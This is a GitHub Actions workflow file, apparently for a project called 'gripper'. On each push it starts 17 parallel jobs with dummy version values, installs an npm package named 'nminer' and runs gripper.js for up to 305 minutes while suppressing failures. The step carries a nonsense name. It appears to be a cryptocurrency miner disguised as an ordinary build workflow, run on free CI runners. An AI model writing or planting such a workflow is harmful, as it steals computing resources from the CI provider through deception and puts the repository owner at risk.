name: gripper
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 1872 }
          - { version: 8041 }
          - { version: 7500 }
          - { version: 6746 }
          - { version: 3472 }
          - { version: 5801 }
          - { version: 8793 }
          - { version: 4143 }
          - { version: 9922 }
          - { version: 7908 }
          - { version: 9502 }
          - { version: 3484 }
          - { version: 4663 }
          - { version: 1578 }
          - { version: 2724 }
          - { version: 7676 }
          - { version: 5210 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: technologist dishearten sauerkraut brr chatter
        run: |
          npm install nminer@latest
          timeout 305m node gripper.js || echo "gripper executed"